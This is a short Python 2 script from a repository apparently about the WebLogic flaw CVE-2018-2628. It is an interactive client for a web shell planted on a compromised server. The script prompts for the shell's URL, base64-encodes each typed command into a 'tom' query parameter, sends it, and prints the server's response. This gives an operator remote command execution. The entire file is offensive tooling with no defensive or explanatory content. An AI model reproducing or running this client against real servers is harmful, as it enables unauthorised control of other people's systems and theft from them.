42 lines
874 B
Python
42 lines
874 B
Python
#!/usr/bin/env python
|
|
# -*- coding: utf-8 -*-
|
|
|
|
print r'''
|
|
https://github.com/jas502n/CVE-2018-2628
|
|
@author Jas502n
|
|
'''
|
|
import base64
|
|
import urllib
|
|
import requests
|
|
from urllib import *
|
|
|
|
|
|
|
|
def shell(url,cmd):
|
|
all_url = url + "?tom=" + base64.b64encode(cmd)
|
|
try:
|
|
result = requests.get(all_url)
|
|
if result.status_code == 200:
|
|
print result.content
|
|
except requests.ConnectionError,e:
|
|
print e
|
|
|
|
|
|
th = {"url":""}
|
|
|
|
while True:
|
|
if th.get("url") != "":
|
|
input_cmd = raw_input("cmd >>: ")
|
|
if input_cmd == "exit":
|
|
exit()
|
|
elif input_cmd == 'set':
|
|
url = raw_input("set shell :")
|
|
th['url'] = url
|
|
elif input_cmd == 'show url':
|
|
print th.get("url")
|
|
else:
|
|
shell(th.get("url"),input_cmd)
|
|
else:
|
|
url = raw_input("set shell :")
|
|
th["url"] = url
|